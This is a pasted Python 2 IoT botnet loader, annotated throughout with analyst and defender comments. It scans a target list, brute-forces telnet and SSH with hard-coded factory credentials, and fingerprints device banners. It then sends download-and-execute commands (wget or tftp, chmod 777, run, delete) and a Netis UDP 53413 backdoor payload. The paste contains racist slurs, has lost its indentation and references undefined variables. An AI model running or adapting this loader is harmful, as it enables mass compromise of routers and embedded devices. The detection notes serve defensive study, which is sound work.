
Untitled

a guest
Dec 27th, 2017
  1. #!/usr/bin/python
  2. """
  3. Ur Mums a Hoe
  4.  
  5. >>>
  6. Need a .lst nigga lulz Iam Not supplying shit
  7.  
  8. """
  9. import threading, sys, time, random, socket, re, os, paramiko
  10. from Queue import *
  11. from sys import stdout
  12.  
  # Analyst summary: module-level setup for a multi-threaded loader that reads a
  # target list, then contacts each address over telnet (TCP 23), SSH (TCP 22)
  # and UDP 53413 using hard-coded default credentials.
  # NOTE(review): indentation was lost in this paste, so block nesting below is
  # not recoverable from the page itself.
  13. if len(sys.argv) < 3:
  14. print "Usage: python "+sys.argv[0]+" <threads> <list>"
  15. sys.exit()
  16.  
  # usernames[i] / passwords[i] are used as positional pairs by ttelnet.run.
  # Defender note: every pair here is a hard-coded factory-default style login;
  # devices still accepting any of them on telnet/SSH are exposed to this class
  # of loader. Rotate defaults and disable password logins where possible.
  17. # USER AND PASS LISTS #
  18. usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  19. passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  20. ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  # First datagram sent to UDP 53413 by nnetis.run; the string contains "netcore".
  # NOTE(review): presumably targets the publicly documented Netis/Netcore router
  # UDP 53413 interface - confirm against vendor advisories.
  21. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  22.  
  23.  
  # The 0.0.0.0 hosts below are placeholders in this paste; the page contains no
  # real staging address, so there is no network IoC to extract from these lines.
  # Detection value is in the command shape: fetch via wget with tftp fallback,
  # chmod 777, execute, then delete the file from /var.
  24. # START CONFIGURATION #
  25. url = "http://0.0.0.0/tftp" # ARM4 Binary
  26. sh = "http://0.0.0.0/bins.sh" # SH File
  27. command = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget http://0.0.0.0/sshd || tftp -r sshd -g 0.0.0.0; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary
  28.  
  29. # DONT TOUCH
  # Sent as-is by the "BCM" branch of ttelnet.run before its download command.
  30. spawn_shell = "cat | sh"
  31. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  # Thread count and target-list path come straight from argv with no validation.
  32. threads = int(sys.argv[1])
  33. ips = open(sys.argv[2], "r").readlines()
  # The three services contacted by the sssh / ttelnet / nnetis classes below.
  # Defender note: these are the ports to keep closed to the WAN side of
  # embedded devices (TCP 23, TCP 22, UDP 53413).
  34. ports = ["23", "22", "53413"]
  35. queue = Queue()
  36. qcount = 0
  37. binary = url.split("/")
  38. binary = binary[3]
  39. ip = binary[2]
  40. found = 0
  41. count = 0
  42.  
  # Every line of the target file is queued unchanged (trailing newline included;
  # the thread classes strip it in their constructors).
  43. for ip in ips:
  44. qcount += 1
  45. stdout.write("\r[%d] Added to queue" % qcount)
  46. stdout.flush()
  47. queue.put(ip)
  48. print "\n"
  49.  
  # Accumulate data received from socket `tn` until `string` appears in the
  # buffer, then return the whole buffer. Reads up to 1024 bytes per recv call
  # and pauses 10 ms between reads. Raises Exception('TIMEOUT!') once `timeout`
  # seconds have elapsed without a match.
  # NOTE(review): the elapsed-time check runs only between recv() calls, so a
  # single blocking recv is presumably bounded by the socket's own timeout.
  50. def readUntil(tn, string, timeout=10):
  51. buf = ''
  52. start_time = time.time()
  53. while time.time() - start_time < timeout:
  54. buf += tn.recv(1024)
  55. time.sleep(0.01)
  56. if string in buf: return buf
  57. raise Exception('TIMEOUT!')
  58.  
  # Queue consumer run by each worker thread: takes one address at a time and
  # starts three further threads for it (sssh, ttelnet, nnetis), then marks the
  # queue item done. Exits via sys.exit(1) when the queue reports empty.
  # Both bare `except: pass` handlers swallow every exception, so failures are
  # never logged or surfaced.
  # Defender note: each target is contacted on TCP 22, TCP 23 and UDP 53413
  # almost simultaneously from one source; that three-port fan-out per
  # destination is a usable correlation signal in flow logs.
  59. def worker():
  60. try:
  61. while True:
  62. try:
  63. if queue.empty() == True:
  64. sys.exit(1)
  65. ip = queue.get()
  66. ss = sssh(ip)
  67. ss.start()
  68. tt = ttelnet(ip)
  69. tt.start()
  70. nn = nnetis(ip)
  71. nn.start()
  72. queue.task_done()
  73. except:
  74. pass
  75. except:
  76. pass
  77.  
  # Thread that handles one target over telnet (TCP 23) using a raw socket.
  # Flow visible in run(): connect with a 5 s timeout, read the banner up to the
  # first ":", pick a credential pair from the module-level lists based on
  # substrings in the banner, send the username, send the password when a
  # prompt containing "assword" arrives, then - if the reply contains a
  # shell-prompt character - send a download-and-execute one-liner.
  # Defender notes:
  #   * Detection: a telnet login followed within seconds by a single command
  #     line chaining cd into /tmp or /var, wget or tftp, chmod 777, execution
  #     and rm -rf of the fetched file.
  #   * Mitigation: disable telnet on embedded devices or keep TCP 23
  #     unreachable from untrusted networks, and replace factory credentials.
  # NOTE(review): indentation was lost in this paste; the nesting of the three
  # try/except sections cannot be confirmed from the page.
  78. class ttelnet(threading.Thread):
  # Stores the target address with its trailing newline removed.
  79. def __init__ (self, ip):
  80. threading.Thread.__init__(self)
  81. self.ip = str(ip).rstrip('\n')
  82. def run(self):
  83. try:
  84. tn = socket.socket()
  85. tn.settimeout(5)
  86. tn.connect((self.ip,23))
  87. time.sleep(0.2)
  88. hoho = ''
  89. hoho += readUntil(tn, ":")
  # Banner fingerprinting: each branch matches a substring of the login banner
  # and selects the credential pair by list index. The matched strings
  # ("mdm9625", "9615-cdp", "(none)", "BCM", generic "ogin") are the device
  # families this listing distinguishes.
  90. if "mdm9625" in hoho:
  91. r00t = 0
  92. username = usernames[1]
  93. password = passwords[1]
  94. tn.send(username + "\n")
  95. elif "9615-cdp" in hoho:
  96. r00t = 1
  97. username = usernames[0]
  98. password = passwords[0]
  99. tn.send(username + "\n")
  100. elif "ogin" in hoho and "9615-cdp" not in hoho:
  101. zte = 1
  102. username = usernames[2]
  103. password = passwords[2]
  104. tn.send(username + "\n")
  105. elif "ogin" in hoho and "mdm9625" not in hoho:
  106. zte = 1
  107. username = usernames[2]
  108. password = passwords[2]
  109. tn.send(username + "\n")
  110. if "(none)" in hoho:
  111. zte = 0
  112. vizxv = 1
  113. username = usernames[3]
  114. password = passwords[3]
  115. tn.send(username + "\n")
  116. if "BCM" in hoho:
  117. zte = 0
  118. vizxv = 0
  119. BCM = 1
  120. username = usernames[1]
  121. password = passwords[1]
  122. tn.send(username + "\n")
  123. except Exception:
  124. tn.close()
  # Password stage: waits for the next ":" and answers only a prompt that
  # contains "assword".
  125. try:
  126. hoho = ''
  127. hoho += readUntil(tn, ":")
  128. if "assword" in hoho:
  129. tn.send(password + "\n")
  130. time.sleep(3)
  131. except Exception:
  132. tn.close()
  # Post-login stage: a reply containing "#", "$", "~", ">" or "root@" is treated
  # as a shell prompt. Each branch below sends one command line that fetches a
  # file from the configured staging URL, marks it executable, runs it and
  # deletes it, then prints a coloured status line and closes the socket.
  133. try:
  134. mp = ''
  135. mp += tn.recv(1024)
  136. if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  137. if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  138. if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  139. if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  140. if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  141. if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  142. except Exception:
  143. tn.close()
  144. pass
  145.  
  # Thread that sends two UDP datagrams to port 53413 on one target: first the
  # module-level login payload, then (after 1 s) a command payload. No reply is
  # read and every exception is silently discarded, so the sender never learns
  # whether the target responded.
  # Defender notes:
  #   * Detection: unsolicited inbound UDP/53413 whose first datagram carries
  #     the "netcore" string from loginpayload.
  #   * Mitigation: drop UDP 53413 at the WAN edge and apply vendor firmware
  #     updates for affected routers.
  146. class nnetis(threading.Thread):
  # Stores the target address with its trailing newline removed.
  147. def __init__ (self, ip):
  148. threading.Thread.__init__(self)
  149. self.ip = str(ip).rstrip('\n')
  150. def run(self):
  151. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  152. try:
  153. # sends netis payload to almost everything lmao
  154. s.sendto(loginpayload, (self.ip, 53413))
  155. time.sleep(1)
  156. s.sendto(commandpayload, (self.ip, 53413))
  157. time.sleep(2)
  158. except Exception:
  159. pass
  160.  
  # Thread that handles one target over SSH (TCP 22) with paramiko.
  # Flow visible in run(): build an SSHClient that auto-accepts unknown host
  # keys, try each "user:password" entry of ssh_passwords with a 5 s connect
  # timeout ("n/a" on either side of the colon means an empty value), run an
  # echo command and look for its marker in stdout to confirm command
  # execution, then send a download-and-execute command line and close.
  # Defender notes:
  #   * Detection: several failed password authentications from one source
  #     followed by a success, then an exec request that writes and runs a
  #     script in /tmp and removes /tmp/* afterwards.
  #   * Mitigation: disable SSH password authentication in favour of keys,
  #     replace default accounts, and rate-limit authentication attempts.
  # NOTE(review): indentation was lost in this paste; the extent of the while
  # loop and of the try/except blocks cannot be confirmed from the page.
  161. class sssh(threading.Thread):
  # Stores the target address with its trailing newline removed.
  162. def __init__ (self, ip):
  163. threading.Thread.__init__(self)
  164. self.ip = str(ip).rstrip('\n')
  165. def run(self):
  166. x = 1
  167. while x != 0:
  168. try:
  169. username='root'
  170. password="0"
  171. port = 22
  172. ssh = paramiko.SSHClient()
  # AutoAddPolicy accepts any host key without verification.
  173. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  174. dobreak=False
  # Credential loop: split each entry on ":" into username and password.
  175. for passwd in ssh_passwords:
  176. if ":n/a" in passwd:
  177. password=""
  178. else:
  179. password=passwd.split(":")[1]
  180. if "n/a:" in passwd:
  181. username=""
  182. else:
  183. username=passwd.split(":")[0]
  184. try:
  185. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  186. dobreak=True
  187. break
  188. except:
  189. pass
  190. if True == dobreak:
  191. break
  # Echo test: the host is treated as usable only if the marker string comes
  # back on stdout, which filters out logins that do not yield a working shell.
  192. badserver=True
  193. stdin, stdout, stderr = ssh.exec_command("echo nigger")
  194. output = stdout.read()
  195. if "nigger" in output:
  196. badserver=False
  197. if badserver == False:
  198. print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  199. ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  200. time.sleep(3)
  201. ssh.close()
  202. if badserver == True:
  203. ssh.close()
  204. except:
  205. pass
  206. x = 0
  207.  
  # Entry point: start `threads` daemon threads running worker(), block until
  # every queued target has been marked done, then print a completion message.
  # Daemon threads do not keep the interpreter alive once the main thread ends.
  208. for g in xrange(threads):
  209. t = threading.Thread(target=worker)
  210. t.setDaemon(True)
  211. t.start()
  212.  
  213. queue.join()
  214. print "Finished!"